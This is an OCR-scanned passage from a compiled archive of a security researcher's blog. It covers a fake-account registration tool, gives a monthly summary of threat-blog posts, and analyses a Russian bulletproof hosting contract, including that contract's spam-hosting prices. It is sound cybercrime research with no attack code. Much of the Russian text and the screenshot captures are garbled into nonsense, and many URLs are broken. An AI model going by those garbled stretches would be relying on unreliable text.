1. Supportted picture formats: jpg. png and jpeg. 


Some of its core features are: 


* support for multi-threads 


* set number ot accounts to generate using a single proxy (malware-infected host) 
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¢ randomization of the posted bogus content to avoid easy detection of the pattern 
* male/female fake account creating capabilities 
* mass account validity checking capabilities 


¢ CAPTCHA-solving integration with third-party CAPTCHA solving services 


Over the years, I’ve been extensively profiling campaigns utilizing purely legitimate infras- 
tructure for achieving the fraudulent/malicious objectives set by the cybercriminal behind the 
Campaign. These cases demonstrate that cybercriminals continue to pursue the efficient and 
systematic abuse of legitimate Web properties, which on the other hand, continue relying on 
CAPTCHA challenges to differentiate between bots and humans using the site, forgetting that 
it’s actually humans solving the CAPTCHAs for the their customers. 


24/7/365. 


Known cases of abuse of legitimate infrastructure for fraudulent/malicious purposes 
over the years include: 


[5]Bogus "Shocking Video" Content at Scribd Exposes Malware Monetization Scheme 
Through Parked Domains 


[6]Fake Codec Serving Domains from Digg.com’s Comment Spam Attack 


[7]Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software 


[8]Dissecting the Bogus LinkedIn Profiles Malware Campaign 


[9]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and 
Blackhat SEO Farms 


[10]Celebrity-Themed Scareware Campaign Abusing DocStoc and Scribd 


[11]Celebrity-Themed Scareware Campaign Abusing DocStoc 


[12]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 


e [13]Pharmaceutical Spammers Targeting LinkedIn 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him [15]Jon 
Twitter. 


1. http://ddanchev. blogspot .com/2009/06/peek- inside-managed-blackhat-seo.htm 


2. http://blog. webroot .com/2013/04/23/captcha-solving-russian-email-account-registration-tool-helps-facilita 


e-cybercrime/ 


. http: //ddanchev. blogspot .com/2009/01/dissecting-bogus-linkedin-profiles.htm 
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9. http: //ddanchev. blogspot .com/2009/06/from-ukraine-with-scareware-serving.htm 


10. http: //ddanchev. blogspot . com/2009/12/celebrity-themed-scareware- campaign. htm 


. http://ddanchev.blogspot .com/2009/12/celebrity-themed-scareware-campaign_07.htm 


. http://ddanchev.blogspot.com/2009/07/from-ukraine-with-bogus-twitter .htm 


13. http: //ddanchev.blogspot .com/2009/02/pharmaceutical-spammers-targeting.htm 
14. http: //ddanchev.blogspot.com/ 
. http: //twitter.com/danchodanche 


9.8 August 


9.8.1 Summarizing Webroot’s Threat Blog Posts for July (2013-08-01 19:01) 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for July, 2013. 


threat blog 


Projects  Suppot Communty&Rescuces Partners About Webroct About the Bloggers 


DIY commercially-available ‘automatic Web site 
hacking as a service’ spotted in the wild 

Wittirk © 3,00 

By Dancho Danchev 


A newly launched underground market service, aims fo automate the unethical penetraion testing process, by 
empowering virtually all of its (paying) customers with what they clamn is ‘private explodation tochniques’ capable of 
compromimang any Web site 


More detaits 
Continue reading ~ 
Ted your treads: Ei Face 0) twee GB Googe +1 [i] Unteo SReost |e) mat Ucee 
Like thes: * 
ets 
hes in Threat Research dc *. Cybercrime Ecosystem, Oft Dey Hacting, Hacting, 4S Access, Oracte Database, PH secuntk Service, SOL 
+ eter a au 0 “> * > 


Custom USB sticks bypassing Windows 7/8’s 
AutoRun protection measure going mainstream 


Search 


at’ 


’ al sp 
i. 
SecureAnywhere 
User Protection 


5 ONE iconse protects. — 
FOUR sevices 


LEARN MORE» 


WEB THREAT REPORT: 


iS YOUR COMPANY EXPOSED? 
Get a compimentary Copy of a new 
Survey, and learn about the latest 
Wed-Dorne Pweats, including ther 
costs and enpacts 


DOWNLOAD THE STUDY NOW » 


Connect With Us 
—— Ss) 


You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


01. [3]Cybercriminals experiment with Tor-based C &C, ring-3-rootkit empowered, SPDY form 


" 


grabbing malware bot 


02. [4]Deceptive ads targeting German users lead to the ‘W32/SomotoBetterInstaller’ Poten- 


tially Unwanted Application (PUA) 
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03. [5]Newly launched underground market service harvests mobile phone numbers on 
demand 

04. [6]Novel ransomware tactic locks users’ PCs, demands that they participate in a survey to 
get the unlock code 

05. [7]Spamvertised ‘Export License/Invoice Copy’ themed emails lead to malware 

06. [8]Cybercriminals spamvertise tens of thousands of fake ‘Your Booking Reservation at 
Westminster Hotel’ themed emails, serve malware 

07. [9]New commercially available mass FTP-based proxy-supporting doorway/malicious 
script uploading application spotted in the wild 

08. [10]Fake ‘iGO4 Private Car Insurance Policy Amendment Certificate’ themed emails lead 
to malware 

09. [11]Tens of thousands of spamvertised emails lead to the Win32/PrimeCasino PUA (Poten- 
tially Unwanted Application) 

10. [12]Spamvertised ‘Vodafone U.K MMS ID/Fake Sage 50 Payroll’ themed emails lead to 
(identical) malware 

11. [13]New commercially available Web-based WordPress/Joomla brute-forcing tool spotted 
in the wild 

12. [14]Rogue ads targeting German users lead to Win32/InstallBrain PUA (Potentially Un- 
wanted Application) 

13. [15]Yet another commercially available stealth Bitcoin/Litecoin mining tool spotted in the 
wild 

14. [16]Deceptive ‘Media Player Update’ ads expose users to the rogue ‘Video Down- 
loader/Bundlore’ Potentially Unwanted Application (PUA) 

15. [17]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercrimi- 
nals with bulletproof hosting capabilities 

16. [18]Fake ‘Copy of Vodafone U.K Contract/Your Monthly Vodafone Bill is Ready/New MMS 
Received’ themed emails lead to malware 

17. [19]Rogue ads lead to the ‘Free Player’ Win32/Somoto Potentially Unwanted Application 
(PUA) 

18. [20]How much does it cost to buy one thousand Russian/Eastern European based malware- 
infected hosts? 

19. [21]Custom USB sticks bypassing Windows 7/8’s AutoRun protection measure going 
mainstream 

20. [22]DIY commercially-available ‘automatic Web site hacking as a service’ spotted in the 
wild 


This post has been reproduced from [23]Dancho Danchev’s blog. Follow him 
[24]on Twitter. 


1. http://blog.webroot .com/ 
2. http://feeds2.feedburner.com/WebrootThreatBlog 
3 


ttp://blog.webroot . com/2013/07/02/cybercriminals-experiment-with-tor-based-cc-ring-3-rootkit-empowered-s 


pdy-form- grabbing-malware-bot/ 


4. http://blog. webroot .com/2013/07/03/deceptive-ads-targeting-german-users-lead-to-the-w32somotobetterinsta 


ler-potentially-unwanted-application-pua/ 


5. http://blog. webroot .com/2013/07/04/newly-1launched-underground-market- service-harvests-—mobile-phone-numbe 


6. http://blog.webroot .com/2013/07/08/novel-ransomware-tactic-locks-users-pcs-demands-that-they-participate- 


in-a-survey-to-get-the-unlock-code/ 


7. http://blog. webroot .com/2013/07/09/spamvertised-export-licenseinvoice-copy-themed-emails-lead-to-malware/ 
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8. http://blog.webroot .com/2013/07/10/cybercriminals- spamvertise-tens-of-thousands-of-fake-your-booking-rese 


rvation-at-westminster-hotel-themed-emails-serve-malwa: 


ttp://blog.webroot .com/2013/07/11/new- commercially-available-mass-ftp-based-proxy-supporting-doorwaymali 
0 


http: //blog.webroot .com/2013/07/12/fake-igo4-private-car-insurance-policy-amendment-certificate-themed- 


emails-lead-to-malware/ 


ttp://blog.webroot .com/2013/07/15/tens- of - thousands- of -spamvertised-emails-lead-to-the-win32primecasi 


o- 7a: potentially-unwanted-application/ 


ttp://blog.webroot .com/2013/07/16/spamvertised-vodaf one-u-k-mms-idfake-sage-50-payroll-themed-emails- 


ead-to-identical-malware/ 


ttp://blog.webroot .com/2013/07/17/new- commercially-available-web-based-wordpressjoomla-brute-forcing-t 


ool-spotted-in-the-wild/ 


ttp://blog.webroot .com/2013/07/19/rogue-ads- target ing- german-users-lead-to-win32installbrain-pua-pote 


ee application/ 


ttp://blog.webroot .com/2013/07/22/yet-another-commercially-available-stealth-bitcoinlitecoin-mining-to 


ol- —— in-the-wild/ 


ttp://blog.webroot .com/2013/07/23/deceptive-media-player-update-ads-expose-users-to-the-rogue-video-do 


loaderbundlore-potentially-unwanted-application-pua/ 


http: //blog.webroot.com/2013/07/24/newly-launched-http-based-botnet- setup-as-a-service-empowers-novice- 


——— with-bulletproof-hosting-capabilities/ 


ttp://blog.webroot .com/2013/07/25/fake-copy-of-vodafone-u-k- contractyour-monthly-vodafone-bill-is-read 


ew-mms-received-themed-emails-lead-to-malware/ 


ttp://blog.webroot .com/2013/07/26/rogue-ads- lead-to-the-free-player-win32somoto-potentially-unwanted- 


— pua/ 


ttp://blog.webroot .com/2013/07/29/how-much-does-it-cost-to-buy-one-thousand-russianeastern-european-ba 


sed-malware-infected-hosts/ 


ane //blog .webroot .com/2013/07/30/custom-usb-sticks-bypassing-windows-78s-autorun-protection-measure-g 


ttp://blog.webroot .com/2013/07/31/diy-commercially-available-automatic-web-site-hacking-as-a-service-s 


Spaeepeeettee 
23. http://ddanchev.blogspot.com/ 
24. http://twitter.com/danchodanche 


4430 


9.8.2 Dissecting a Sample Russian Business Network (RBN) Contract/Agreement 
Through the Prism of RBN’s AbdAllah Franchise (2013-08-10 21:10) 


Abdulla Hosting i. simmpke, machines forum 


ee 


Loteo nomanceats, Tocth. Nomanyhcta, eorgnie mm paper 


[ _ [rseceras =] [Savin 


Boam 


Mosocre) Hooes yore!!! VPS copsape: we Care Texmanorm: MIN. Pyewee COOTHOMEMNe WOMEN HK eCECTER De somone ued mepopmsunel ofp em sires: , | None | 


ee es 


Tere Cmre HONPOCKt 


Meececr _ AS Rac neget omer or 
Corbaersd 0 Ra) Copaep ¢ mrmoeenn 
Be HODOC TH HOWTO CEPENca, CNeUMareHtee NPEANOMEreTA HT. S Te Cenretps 33, 2007, 08/2026 pm 
Xoc tur © Coo6ereredi | Sotnemmed omer ev 
Borpotes, COADIHHEIO C BNPTYArOHDE KOC THOR sin Aaryers 24, 2007, 04/19157 pm 
Dodicoted/VPS cepropes Pred 5 Doguared ower or dep 
Borpoce, COMBaeee C OBCNY=HBBertH, HaCTpPoreor 1 PaSOTON sRMENerHRE M BELENteen BHPTyarEHEx Cepsepoe Y Tew Mapre 32, 2008, 34:03:48 pm 
Tosser 0 Coobmene’ 
BOmpOCes, COMESHRIO C ROMErHRIE Her BeT © Tes 
Npepnomernen 0 Coobuereet 
Bau ADL NOK OHM, NOmeNseen 1 DaMeuaer NO paSoTe HAWwerO Cepence OCTaEnmiTE & aTOH Tene 0 Tew 
Pomoe 0 Cootaenet 
Borpece, KOTOR HOFER OTHECTH K DIMUGyYKaReremIM TeMaM OTe 
Abdullo Hosting - enbopmraspeormine? uentp mad 
Cratectvna Gopyna 
270 CooGujorni & 98 Tex OF 32 Nore, Nomepent mone pos ates: Vampirenok 
$ Mocresnne cooduerow: “eompece” (am 2000S 
Narn soneTer« Online 
2 Tocteh, 0 Nonssoeateneh 
Macciinyn Ondine ceroaye: 2. Manoeryn Onkne: 10 (Aarycta 13, 2007, 11:01:05 pm) 
BOOT (hebee mapore?) 
2 Von none s000TERH: Noapone: as appa coccrm (@ munytax): Sanorerte: — 
: 60 Cd = 


[1]The Russian Business Network (RBN), is perhaps the most speculated, buzzed about, 
cybercrime enterprise in the World, a poster child for fraudulent activity ‘streaming’ from 
‘Mother Russia’, in the eyes of respected/novice security/cybercrime researchers across the 
globe. 


However, what a huge percentage of the researchers who’re just catching up with its 
'[2]fraudulent performance metrics’ over the years, don’t realize, is how a newly emerged 
bulletproof hosting provider, managed to end up, as the World’s most prolific source of 
fraudulent/malicious activity. 


Hint: Basic business concepts like franchising, signalling the early stages of the modern- 
ization/professionalization of cybercrime, where being the benchmark has had a direct 
inspirational impact in the ‘hearts and minds’ of current and potential cybercriminals, then 
and now. 


Case in point is [3]Abdallah Internet Hizmetleri also known as AbdAllah (VN), an ex-RBN 
darling relying on the franchise business concept. 
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In this post, I'll discuss a sample contract/contractual agreement that every one of its 
customers had to sign before doing business with them, which in the broader context leads to 
a situation, where while the franchise is publicly advertising the bulletproof hosting services 
for trojans, exploits, warez, adult content, drop projects, botnets and spam, it’s explicitly 
forbidding such activities - with some visible exceptions - in its contractual agreement. 


What does this mean? It means that the Russian Business Network, the benchmark for 
the majority of ex/currently active bulletproof hosting providers, has been (legally) forwarding 
the responsibility for the fraudulent activity to its customers, in between reserving the right to 
act and deactivate their accounts if they ever violate the agreement/contract. The first thing 
that comes to my mind when it comes to the RBN ’reaction’ in a socially oriented manner, are 
the infamous [4]RBN Fake Account Suspended Notices, and that’s just for starters, indicating 
a deteriorated understanding of malicious/fraudulent activity, with high profit margins in mind. 


Let’s go through the contract/agreement that every customer used to sign, before doing 
cybercrime-friendly business with them, both in original Russian, and automatically translated 
in English. 


Sample AbdAllah (VN) Contractual Bulletproof Hosting Agreement/Contract in Russian: 
1. FPEAMET OFOBOPA 


1.1. 3aka34uk nopyyaeT, a VCIIOJIHUTE/Ib 6epeT Ha ce6s 0683aTeE/IbCTBa NO Pa3MeLUEHUI0 
u/usn peructpayynu BupTyasibHoro cepBepa 3AKA3YUKA B ceTu UnTepuHerT. 


2. YCJIOBUA BbINOJIHEHUA LOFOBOPA 


2.1. [lo 3aKt4YeHM!O HacToslyero AZoroBopa VCMIOJIHUTEJIb npou3BO4UT NepBoOHaYa/IbHy!0 
YCT@HOBKY VY HaCTpOUkKy BUPTYa/IbHOrO CepBepa u obecneyNBaeT ZBAKAZUNKA Heobxogumonu 
YHMOpMalNeU JIA AQMUHUCTPUPOBAaHUA BUPTYAa/IbHOrO CepBepa. 


2.2. MCIOJIHUTEJIb o6ecneywBaeT goctyn B ceTU MHTepHeT K BUPTYa/IbHOMy cepBepy, 
a@ Tak Ke PaOOTOCNOCOOHOCTb BCeX AOCTYNHbIxX cepBYcoB 3AKA3YMNKA Kpyr‘ocyTO4HO B 
TeYeHNe CeMN AHEN B HEJe/bO. 


3. LIEHbI VW MOPAAOK OFIATbI 


See CTOUMOCTb UW NopsgoK onsaTbl paboT No HacTOALeMy AOrOoBOopy Ha MOMeHT 
ero 3akK/I0OYeHNA =onpesesAeTCA B COOTBETCTBUM C AeUNCTBYIOLUNUMUY YC/OBUAMY, 
pacnpocTpaHsembimMy coTpygHukamy no E-Mail u/unu ICQ. 


3.2. Onyata BHocutca 3AKA34YUKOM B CYeT OMlaTbl ycAyru NOAZAZepKKU BUPTYya/IbHOrO 
Be6-cepBepa VUCIMOJIHUTEJIEM. UCIIOJIHATEJIb BnpaBe MPYOCTaHOBYTb NMpeAocTaBseHue 
yC/IYT MPU OTPUL|aTeEJIbBHOM COCTOAHMUN CyYeTAa. 


3:3: Bce BbIZe@/Ie@HHbIe CepBepbl nNpegoctaBlsroTtca B coctosHun UNMANAGED, T.e 
agmunuctpatops! UCMOJIHUTE/IA moryt, HO He OBSA3AHbI HacTpauBaTb apeHgAyempin 
cepBep. 3a smnW6yto HacTpouky cepBepa 3AKA3Y4NKA, 1u60 CKpUunTOB Ha HEM - B3bIMaeTCA 
nylata B pa3mMepe 50 USD/3a 1 Yac paboTb! agmMuHuctpatopa UCHO/JIHUTE/IA no Bawemy 
Bonpocy, MUHYMymM nos yYaca. T[lomHOe aAMUHUMCTpYNpoBaHue cepBepa cneynanucTamu 
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UCHO/IHUTESIA crout 250 USD B Mecay. BeCNaTHO OCYLIECTB/IAETCA Nepe3zarpy3Ka CepBep 
(ECM HET ABTOMATUYECKON GopmMbI 4/18 3TOFO). 


3.4. B cnyyae He onsaTbl ycryr 3AKA3YUNKOM B nocnegHun geHb 6u“sNUHrOBOroO Nepuvoga, 
AaHHple BAKA3YUNKA yAanaIoTcaA NO HaCTYMIeCHUtIO HOBbIX CYTOK 6e€3 BO3BpaTHO. B cyyyYae 
BUPTYa/IbHOrO XOCTUHTa YAANACTCA aAKKAaYHT VU BCe O3KaNbI AAHHOFO akKayHTa, B C/yYae 
apeHAbl cepBepa (dedicated uu vps) cepBep CHYUMaeTCA C OOC/YMKUBAHNA, MOPMaTUpyIOTCA 
MecTKNe AUCKU. 


4. OTBETCTBEHHOCTb CTOPOH 


4.1. WUCHO/JIHUTE/Ib He HeCceT OTBeETCTBeHHOCTU nepeg 3AKA3YUNKOM usu TpeTbumu 
CTOPOHaMNL 3a 1106bI/e 3A4eEPXKKU, NPepbiBaHuaA, YLUEPO YIN NOTepU, NPOUCXOAALUNe V3-3a: 
(a) geqmeKTOB B JSIKHO0M 3/IEKTPOHHOM WIN MexaHuyecKOM o6opygoBaHuu, He 
npunagyexKatem UCHOJIHUTESIHO; 

(6) npo6mem npn nepesaye AaHHbIX YIN COeANHeHNNY, NpOUZ0WeALINX He MO BUHe 
UCHOJIHUTEJA ; 

(B) BCNCACTBNe OOCTOATENbCTB HENMPCOAOJUMON CUsIbI B OOLUENPUHATOM CMmbIC/e, T.é. 
YPe3BbI4YaNHbIMU CUIA@MN VU HenpeAOTBpaTUMbIMU OOCTOATeC/IbCTBaMuU, He NoANeKalumMu 
Pa3YMHOMY KOHTPOJIW; 

(r) AaBsleHve BAacTeN. 


4.2. llpv pactopxkeHuu AoroBopa no “vnuynaTuBe 3AKA34UUNKA, Hevcnosb30BaHHaA YaCTb 
aBaHca 3AKA3YUNKY He Bo3BpallaeTca. 


4.3. MCNOJIHUTEJIb octasnaeT 3a co60K’ mpaBo npuvocTaHoBuTb Ob6c/y*KMBaHNe 
3AKA34NKA nan pactoprHyTb gorosop B 6e3yCJIOBHOM nopsgKe 6e3 BO3BpaleHna 
CPeCACTB 3aKa34NKy B CIC AYIOLUNX CIYVAAX: 


- pa3MeluueHnNe ZeTCKOK NnopHorpadun vu 300qusinnu B 060M Bue; 


- NOMbITKV B3/10Ma, HECAHKLUMOHMPOBaHHOrO MPOHMKHOBeHNA Ha CepBep, B aKKayHTbI 
APYIWX KJINCHTOB, NONMbITKK Nopun O6oOpyMAOBaHHA HIN NporpamMMHoro ObecneYeHHA; 


- NONMbBITKKH B310Ma NPaBUTeJIbCTBeCHHBIX opraHv3zaunn B 711060M Buge; 


- nonbiTkw cnama srboro podfa C Hallinx C@PBeCPOB BUPTYaJIbHOrTO XOCTHHIa, KpomMe 
Kak YWepe3 COKCBI,; 


- NONMbITKH q@uwnHra GaHkoB (Kpaxka geHer); 


- pasMewmeHne nvHqdmopmMaunn no TOprospse OpyxXnvem HW HapKOTHKaMN, TOpProBJin 
JIIOMbMKU WK OPpraHamMu niogeuv, Bbi3bIBaloLlune MCKHAUNOHAJIBHYHO KW PpeJINTHO3sSHYIO 
PO3Hb, NPUK3bIBAarOL YO K BOMHe HW Hacusinlo; 


- HeonpaBgAaHHaad Neperpy3kKa BbIYMCJINTeCJIBHbIX MOLUHOCTeK CepBepa BUPTya/IbHOro 
XocTHHra (gonyckaeTcA KMCNONb30BaTb He Gbosee 5 % MOLIHOCTH Npoueccopa uv He 
6onee 128M6 onepaTHBHOK NamMaATH CepBepa); 


- NONMbITKH B3s/I0Ma C CepBeposB (dedicated wu BupTya/bHbIM XOCTHHT) - CepBepbi, 
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KOTOpPbie PaCnOJIOKeHbI PAAOM B cTowkKe, “60 KJINCHTOB 3TOK x*e CTpaHbi, rae 
PpacnoJIOKeH CepBep; 


- ockopOs1eHne B 11060K M@opme COTPyYAHMKOB CepBica. 


4.4. UCHIOJIHUTEJIb He oTBeYaeT 3a COgepxaHve UHqdopmayuu, pa3zmMeuwjaemMou 
BAKA3 UNIKOM. 


4.5. MCHOSIHUTE/SIb He 6byg4eT HECTU OTBETCTBEHHOCTU 3a Obie 3aTpaTbI usIN yWepo, 
MPAMO VWJIN KOCBEHHO BO3HUKLUNE B PC3Y/JIbTATE UCMO/Ib3OBAHNA YCIYFUN BIO XOCTUHTa. 


4.6. MoneyBack 3a BbIQ@/ICHHbIN CepBep BO3MOKECH TO/IbKO B TOM cyIyYae, eC/IN 
H@AOCTYNHOCTb JaHHoro cepBepa npoucxoguT no BuHe UCIIOJIHUTE/IA, BBugAy Toro, 4TO 
UCHOJIHUTEJIb onayuBaeMm NO/IHY!O CTOMMOCTb cepBepa B AaTa-LleHTp. Take BO3MOKHAa 
3amMeHa CepBepa. 


4.7. PazmMeujeHne cavtToB 3AKA34NKA, peknamupyembpix SPAMom Ha cepBepax 
MCNOJIHUTEJIA (Kak BUpTaysIbHOrTO XOCTHHTa, Tak HW dedicated) onnayunuBaetca 
OTMeJIbHO H3 pacyeta OObema nucem. [pu o6beémMax OT 5M1H BO 10MH =1000 USD 
- 1500 USD B mMecay 3a cepBep B KuTae unin TourKonre, mn6o0 150 USD HegenaA nin 
500 USD B Mecay, 3a BUPTyaJIbHbIK XOCcTHHT, Gosee 10-20 MAH. = 200 USD Hegena 
mn6o 2000 $ 3a BbIZe/ICHHbIN CepBep. 


4.8. UCHIOJIHUTE/Ib o6s3yeTcA gelaTb @XKeAHEBHbIE PeZEPBHbIE KONMUN akKayHTa 
BAKA34UNKA Ha CTOPOHHUN CepBep (TO/IbKO BUPTYa/IbHbIN XOCTUHT). 


4.9. NCNOJIHUTEJIb o6s3yerTca pewiaTb CAMOCTOATEJIBHO BCe KaNoObb! (aby3bi/abuse), 
He mpyvBsekan K 9TOMyY 3AKA3YUNKA vn 6e3 BMeWaTeJIbCTBa B AaHHbie 3AKA3YNKA. 
NYCNOJIHUTEJIb He pewaeT Xxas06bnI (aby3bi/abuse) oT nonnunn, KPyNHbix 
NpaBuUTeJIbCTBeHHbIX OpraHn3auNH HU VerSign. 


4.10. WCHOJIHVTEJIb He gaeT HukKakux rapaHTuu, 4TO BZomMeH 3AKA3YNKA He ObysgeT 
3a6/IOKUPOBaH NO s1H06bIM MpPNYWHaM, a OCOOCHHO Takum Kak s11000/ Bug SPAMa, fraud, 
phishing u T.n. 


5. KOH@NUAEHUNASIBHAA UH®OPMALUA 


5.1. CTopouHbi o6s3yroTca 6e3 OO0WAHOrO cormacuaA He nNepegsaBaTb TPeTbUM JINLamM 
JIMOO UCNOb30BaATb UHbIM CnOocobOM, He MPeZYCMOTPeHHbIM ycyoBYsaMU oroBopa, 
OpraHU3ZaAlWNOHHO-TeEXHOJIOFMYeCKYHO, KOMMePYeCKy0O, QUHAHCOBy!O VU UHytO YUHQopmaluio, 
COCT@B/IAIOLUYIO CEKPeT 4/18 JIWOOON U3 CTOPOH (gaslee - "KOH@UAeCHUNabHaA NUHQopmMayna") 
Mpu yC/IOBUN, 4TO: 


- TakaaA “uHq@opmMauna UMeeCT AUCTBYTeNbHY!O YUJIUN MOTECHLUNAJIBHYWO KOMMePYeCKY!0 LICEHHOCTb 
B CUJIY CC HEUZBECTHOCTU TPeETbUM JINLIaAM, 


- K Takou “vHq@opmayun HeT CBOOO4HOrO AOCTYNMa Ha 3A€AKOHHOM OCHOBAHUYN, 


- OONagaTesIb TakoU YHq@opmayuu MPUHUMAaeT HaAvieKalluNe MEpbl K o6ecneyeHuto ee 
KOHQUACHUNAJIBHOCTU. 
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5.2. CTopoHs! o6s3yroTca, 6e€3 Ob6O0lWAHOrO cornacus, He NepesaBaTb TpeTbUM NULLAM 
CBeJeHNaA 0 cogepxaHun u ycnoBusax Jorosopa. 


5.3. MNCNOJIHUTEJIb ob6sn3yeTcA NpegoTBpalaTb 3anmvcb JIOrOB Ha cepBepax 
BUPTyaJIbHOrO XOCTHHTa KH MapuuipyTH3vpyroulem obopyAoBaHun. 


5.4. ByAbTe BHYMaTebHbI, COTpygHUuKY UCTIO/IHUTES/IA He 3anpauiuBatoT Naposmu OT 
@KK@aYHTOB BUPTYa/IbHOrO XOCTUHTa VU BbIZe/ICHHbIX CepBepoB. VCKHIOYeHNeM AB/IACTCA 
cutTyauna, Korga 3AKA34NK npocuTb npou3BecTu Kakue-sN60 paboTb! Ha ero BbIges1eHHOM 
Cepsepe. 
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So 


floteo nomanceats, Tocth. Nomanyhcta, songnie nm daperncloweyrht 


[___[____ Prseceras =] [earn] 


Boam 


Mosocrm) Horas yore!!! VPS copsape: we Gare termoneres MIN. Pyewee COOTHDEEMUe UeHN HH HWECER De aemomutem ued mebopmaunel ofoemalirecs 7) aT Nonce | 


Keene COT y dene toe 


Abdulla Hosting - Uentp Crotectam 


Bcero Mom sce@arenei: 32 CPOAHee KOMTAECTOO HOeEEX NONDIODATENEA B AeKo 0.15 
Boero coctusenh 270 CpeAnee Komreecteo COcCule+es 0 Ate 1.26 
Bcero tom ro] CpeAnee KOMTeeCTRO TOM 8 AeKo 0.47 
® beero xareropui 1 @® ecero panene 16 
Nomsceareaneh Oriinw 2 Nocnegnii mam so@arens pironok 
Maxcverye Onkne 10 ~ Asryeta 13, 2007, 11:01:05 pm CPeAnee KOMTeeC TOO Nomsce@aTENeh Oriine 0 AgKe 1.43 
Ceroaya Onkne 2 COOTHOIOHIIO MY Nea - MHL 10 
Depeor ACCATKA NOND2ORaTeNeA Nepecs Aecalne poaaence 
EEE 17 
s2 | —— 1) 11 
18 = 8 


| 16+ 
= 

a 

| 

| 

| 


® yxo re 


ACCATKO Commex ont noKnex on Tope 


y 
5 
? 
? 


Automatically translated Russian Business Network (RBN) Contractual Agreement/Contract: 
1. SUBJECT OF CONTRACT 


1.1. Customer Requests, but ARTIST is committed to the placement and / or registra- 
tion CUSTOMER virtual server on the Internet. 
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2. CONDITIONS OF IMPLEMENTATION OF THE TREATY 


2.1. At the conclusion of this treaty ARTIST produces initial setup and configuration of 
the virtual server and provides the necessary information for CUSTOMER virtual server 
administration. 


2.2. ARTIST provides access to the Internet to the virtual server, as well as efficiency of 
all available services CUSTOMER day seven days a week. 


3. PRICES AND ORDER OF PAYMENT 


3.1. Cost and arrangements of works under this contract at the time of its conclusion is 
determined in accordance with existing conditions, the staff distributed by E-Mail and / or ICQ. 


3.2. Payment is made ZAKAZCHIKOM as payment services support virtual web server IS- 
POLNITELEM. ARTIST right to suspend the provision of services at a negative status of the 
account. 


3.3. All dedicated servers are provided in a position UNMANAGED ie ISPOLNITELYA ad- 
ministrators can, but not OBYAZANY tune rented server. For any server setup CUSTOMER or 
scripts on it - charge of $ 50 USD / for 1 hour administrator ISPOLNITELYA to your question, at 
least half an hour. The full server administration specialists ISPOLNITELYA worth USD 250 per 
month. Free done rebooting the server (if not automatic form for this). 


3.4. If no payment ZAKAZCHIKOM bill on the last day of the period, the data are re- 
moved CUSTOMER new offensive on days without reciprocating. In the case of virtual hosting 
account and removed all of your backups, in case the rental server (dedicated or vps) server 
is removed from service, formatted hard drives. 


4. RESPONSIBILITY OF PARTIES 


4.1. ARTIST no responsibility to ZAKAZCHIKOM or third parties for any delays, interrup- 
tions, damage or losses that occur because Of: 

(a) defects in any electronic or mechanical equipment, not belonging ISPOLNITELYU; 

(b) problems in the transfer of data or connection that occurred through no fault ISPOLNITELYA; 

(c) due to force majeure circumstances, in the conventional sense, that is, nepredotvratimymi 
forces and emergency circumstances, not subject to reasonable control; 

(g) pressure from the authorities. 


4.2. At the dissolution of the Treaty on the initiative CUSTOMER, ZAKAZCHIKU unused 
portion of the advance is not refundable. 


4.3. ARTIST reserves the right to suspend or terminate CUSTOMER service contract 
in order without the unconditional return of customer funds in the following cases: 


- Locating and zoofilii child pornography in any form; 


- attempted burglary, unauthorized entry to the server, in the accounts of other 
4436 


customers, trying to damage equipment or software; 

- attempted burglary governmental organizations in any form; 

- spam attempts of any kind from our servers hosting virtual except through SOCKS; 
- phishing attempts banks (stealing money); 


- posting on the arms trade and drug trafficking, or human organs, causing 
inter-ethnic and religious discord, calling for war and violence; 


- unjustified computing power overload virtual server hosting (which is allowed to 
use no more than 5 % of CPU capacity, and no more than 128 MB of RAM server); 


- attempted burglary of servers (and dedicated virtual hosting) - servers, which are 
located next to the rack, a customer in the same country where the server; 


- insulting to any form of service personnel. 


4.4. ARTIST is not responsible for the content of the information posted ZAKAZCHIKOM. 


4.5. ARTIST shall not be liable for any costs or damages arising directly or indirectly 
from the use of Web hosting services. 


4.6. MoneyBack for dedicated server is possible only in case the inaccessibility of the 
fault occurs on the server ISPOLNITELYA, because ARTIST pay for the full cost of a server in 
Data Center. Also possible replacement server. 


4.7. Placing sites CUSTOMER advertised on servers ISPOLNITELYA SPAM (as 
virtauInogo hosting, and dedicated) is charged separately at the rate of the volume 
of letters. With volume of 5 million to 10 million USD = 1000 - 1500 USD per month 
for the server in China or Gong Konge or 150 USD week, or 500 USD per month for a 
virtual hosting, a 10-20 million = 200 USD week, or $ 2000 for a dedicated server. 


4.8. ARTIST undertakes to do daily backups CUSTOMER account for the third-party server 
(only virtual hosting). 


4.9. ARTIST undertakes to decide all complaints (abuzy / abuse), are not en- 
gaging in the CUSTOMER and without interference in the CUSTOMER data. ARTIST 
does not solve complaints (abuzy / abuse) from the police, government organiza- 
tions and major VerSign. 


4.10. ARTIST gives no guarantees that the domain CUSTOMER not be blocked for any 
reason, but especially like any kind of SPAM, fraud, phishing, etc. 


5. CONFIDENTIAL INFORMATION 


5.1. The Parties undertake without the unanimous consent not to transfer to third par- 
ties or used in any other way other than prescribed conditions Treaty, organizational and 
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technological, commercial, financial and other information, which is the secret to any of the 
parties (hereinafter - "confidential information"), provided that: 


- this information is actual or potential commercial value by virtue of its unknown third parties; 
- to such information no free access to the lawful; 
- holds such information shall take appropriate steps to ensure its confidentiality. 


5.2. The Parties undertake, without unanimous consent, not to transfer to third parties 
about the content and conditions of the Treaty. 


5.3. ARTIST undertakes to prevent logging on servers and virtual hosting routing 
equipment. 


5.4. Be careful, do not require employees ISPOLNITELYA passwords from virtual hosting 
accounts and dedicated servers. The exception is when CUSTOMER request to any work for 
his Vydelennom Server. 


Excluding the direct offering of managed servers for spam sending in the actual agree- 
ment/contract, and the fact that their abuse department is virtually non-existent, the contact 
explicitly prohibits related malicious/fraudulent activity. Naturally, that’s not the case when 
AbdAllah (VN) used to advertise its bulletproof hosting service across cybercrime-friendly 
communities, "back in the day”: 


very day ger ' V 
tart! We do net sell karzhesrpmi servers! ¢ F km Hong & ratakeee 


In 2013, despite the overall availability of RBN-like bulletproof hosting providers, cybercrimi- 
nals continue experimenting with abusing legitimate infrastructure in an attempt to mitigate 
